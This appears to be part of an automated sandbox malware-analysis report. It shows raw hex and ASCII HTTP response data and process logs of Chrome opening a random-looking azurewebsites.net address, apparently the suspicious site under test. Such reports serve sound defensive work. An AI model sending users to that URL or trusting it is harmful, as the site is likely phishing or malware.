                          2024-05-24 23:00:51 UTC1369INData Raw: 6c 85 a7 6f d0 2a 65 86 34 1e 0e d5 40 bb 34 bf ce e6 6b 73 bc a9 6f 78 84 87 e9 b3 74 6f b8 c0 7a 2d 0d 04 31 75 76 e0 d0 13 a7 62 ef 2a c8 c1 c6 62 f7 61 5b f2 7f 95 05 17 5c f0 51 85 36 86 21 51 43 08 f8 ec de 9e f7 a0 36 e7 b9 ea 1f fa 32 30 dc f6 1c c4 bd 72 b9 26 90 52 13 68 5b c0 35 b0 80 a5 52 09 3b 96 a8 5f 93 3a 20 54 3a 83 f8 2b 4d 7e ac 3a b7 db bc 52 de 1d 3f c2 15 31 d6 ae 84 9a cf 08 17 f5 20 e1 5c de e9 1b 21 10 dc 8e 60 30 ef d1 ab 65 e5 8b 56 ce ae 88 d4 7b 1e 44 46 6e 2d 8f 24 f9 2b 3c 77 a0 5f 19 11 e3 c1 d0 fa 07 a4 b1 5f 29 21 91 78 6c 27 98 4c 45 d2 3f f0 6d c4 e0 3c 47 ce 5b e3 54 ff 8f 2a 31 f6 d7 09 31 e7 db ac 27 ff 36 ce 4f b3 24 c0 e7 99 de fc 71 e9 e9 e3 82 f8 88 f5 14 75 cd f7 34 94 61 7c 39 3d 99 ad 16 f5 1f 17 2b 35 9b 9b
                          Data Ascii: lo*e4@4ksoxtoz-1uvb*ba[\Q6!QC620r&Rh[5R;_: T:+M~:R?1 \!`0eV{DFn-$+<w__)!xl'LE?m<G[T*11'6O$qu4a|9=+5
                          2024-05-24 23:00:51 UTC1369INData Raw: c1 50 48 ec 9f 5c ca 6f 1c bf 04 30 b7 8d d3 05 4b ce 94 77 30 87 af 3b fc d5 57 6f f0 25 3b 3e a3 72 4a 02 8e 7c 21 21 02 ea c6 4d c3 66 05 f1 f8 08 04 c7 30 fb 88 43 90 65 a2 37 0a 86 7b 55 14 21 fe b7 06 0e 11 8f 73 09 c9 d7 dd a9 1f 42 0f 09 11 10 b5 0d 7e 88 1f fa a9 1e 22 b6 8b c5 42 31 71 9c 2a 4e f2 b8 fc 6a 84 2b 37 5e 37 5e 26 d4 44 43 85 cf 9e 3e 70 14 42 d7 5b a6 69 5b 97 49 b5 4a f7 e7 7b a5 18 70 55 0f 86 5b 2f 54 12 25 70 6f 36 94 c2 5a b3 23 6a d6 c7 12 27 cf c1 6c 9a 1f 32 46 09 ce 3b 78 c6 45 c6 07 7d 6f 77 8e 91 cc f0 73 48 b7 25 9f 6d fe b9 9f 4f 17 d5 4d 98 0e a7 25 95 a3 81 78 42 20 ea 57 ce 62 c4 f3 d2 b8 cb 6a f9 30 e2 ab eb 04 19 8e 01 f9 89 8e 03 dd c1 f1 de 15 17 4c 18 99 e6 04 f3 40 e5 e8 3a 49 cf e0 39 aa 8a 70 8a 74 e5 b0 0d
                          Data Ascii: PH\o0Kw0;Wo%;>rJ|!!Mf0Ce7{U!sB~"B1q*Nj+7^7^&DC>pB[i[IJ{pU[/T%po6Z#j'l2F;xE}owsH%mOM%xB Wbj0L@:I9pt
                          2024-05-24 23:00:51 UTC1369INData Raw: 6a a5 8f 84 c6 68 2e 27 b3 54 d7 17 6a 4a 68 8d d5 20 b6 63 6c c2 74 f5 95 5c 17 5b a7 db df 2d 6c 10 65 33 1f 60 2d 63 51 a5 1c 94 c5 ad ff 07 83 c9 26 51 85 a1 d3 47 27 20 99 90 ad 2c 11 85 78 c2 6a 10 f3 77 31 78 03 05 fb 8a 6f 84 81 15 7b 96 e5 32 7c 94 49 2b 0c 13 88 06 1e 84 bb 98 4f f7 ae 7e dc 08 93 80 27 33 c0 ea bd 99 47 19 05 9a a6 3c 8b 5d e1 42 93 d0 e9 16 94 d4 36 35 1e 40 c8 42 7a 5d 32 e2 22 5f 31 9e 2a 81 8f 3f e4 89 e4 39 31 14 9b bc 93 f5 52 b8 ca 84 22 7c 72 9b 72 49 b5 4f db e5 35 ee 06 42 2f ab 62 7d 41 0c ff c4 7e fa d1 53 b0 8e 90 3c 7d 1a e0 fe cb 36 2f 7e ac c8 52 64 d6 de d5 66 36 c4 4c 49 6b 84 f1 b8 29 36 67 47 af a2 1a d3 8b d3 e6 9e 3a ed 5c 18 36 75 95 a8 21 3d a7 a8 a2 2f 30 0f 32 d4 4a 9d 22 47 1d f5 f6 78 5a 3a 53 bb 98
                          Data Ascii: jh.'TjJh clt\[-le3`-cQ&QG' ,xjw1xo{2|I+O~'3G<]B65@Bz]2"_1*?91R"|rrIO5B/b}A~S<}6/~Rdf6LIk)6gG:\6u!=/02J"GxZ:S
                          2024-05-24 23:00:51 UTC1369INData Raw: e1 2c f2 cd c1 8f c9 b6 db fc e9 97 47 cc e6 34 32 68 e9 d2 39 d9 18 72 69 d3 0a 6c 23 83 33 f1 36 d5 be 22 4b be 0c 9d 21 4e 23 16 a7 67 aa 6d e7 52 79 04 77 33 ea 08 03 a1 ea 77 55 0c 76 23 86 e6 8b d5 fd c1 b5 b8 d7 42 5c 83 18 02 5e 0d 8b 04 12 0d d0 cf 89 e8 60 cf 1a 19 1a e2 42 f1 a0 55 22 5e 90 91 26 8e 15 c3 66 0f cf 5b b1 71 03 98 b6 f8 6e 1e e1 34 78 95 73 6f f9 9c ee 2f 46 52 b3 5e 85 e0 ca c6 39 1b 0e 50 cd 90 04 d0 14 f1 df fe cc 0c dd 32 b8 94 9b 10 e8 41 aa f7 9c b4 a5 7c bb e8 7f 12 6d dd a5 7c e4 b5 dc 55 cf a0 69 f7 16 cd 8f 58 b1 b5 c4 5e fd b7 ca b9 e3 9c f1 e1 ba d6 71 1a d6 93 bb 90 98 4a 87 15 02 b1 cb b2 0f 9a 02 e9 7e c3 6e 26 6b 69 0c a7 60 13 3b 18 bd 63 bb 40 62 4a 62 b2 32 a2 21 09 9e cd 85 83 0c 4d 0b 76 51 d4 18 45 73 c2 c5
                          Data Ascii: ,G42h9ril#36"K!N#gmRyw3wUv#B\^`BU"^&f[qn4xso/FR^9P2A|m|UiX^qJ~n&ki`;c@bJb2!MvQEs
                          2024-05-24 23:00:51 UTC1369INData Raw: ee 33 fa c7 51 1c 4d 60 78 62 22 fc 4e 64 f2 b9 dc 1d 71 a4 b7 46 3f 18 81 87 b1 7a d3 34 d2 a0 e4 11 af 63 49 75 2f 64 86 f8 14 ac be 6a 21 f4 f5 c3 23 ee 60 da d0 85 96 3d 96 ba 74 c3 9f c6 b5 9c 93 c6 38 6f 3c 14 fc 21 13 fd ae 54 6b 57 95 92 4c 9c e8 01 24 af cc 87 e7 8d 90 13 ce af c8 70 35 2c 20 01 8d 77 e5 c1 73 69 88 5e a1 fe 11 16 e6 f1 71 4b 50 e0 a6 b7 cc 15 ad 92 c9 b4 13 b2 60 68 48 f4 8a a5 d1 c1 0b a3 13 73 05 08 69 e2 f7 be 25 99 7d 8c b4 ac 40 4e ad 57 f7 74 b6 72 c6 81 a8 bd e4 9c 43 de 8f da a8 50 97 d8 e7 50 2e 41 c9 d2 87 b2 39 05 3b 70 c0 f9 ff b7 69 e3 9d e1 b2 5a 5d cb a8 cb 9b d9 15 8d bd 29 85 eb ae 9c e3 79 f7 46 4a c2 4a 1c 2d e2 2f 29 b6 fb 60 2f 4c 7e 2d d8 1e 42 b8 74 b8 27 cf 5a 85 13 a7 ac f3 ea 85 67 93 66 3a 94 4a ee 4d
                          Data Ascii: 3QM`xb"NdqF?z4cIu/dj!#`=t8o<!TkWL$p5, wsi^qKP`hHsi%}@NWtrCPP.A9;piZ])yFJJ-/)`/L~-Bt'Zgf:JM


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:19:00:20
                          Start date:24/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff684c40000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:2
                          Start time:19:00:23
                          Start date:24/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2336,i,16897926013340599642,15808530156827528481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff684c40000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:3
                          Start time:19:00:27
                          Start date:24/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/"
                          Imagebase:0x7ff684c40000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Disassembly

                          No disassembly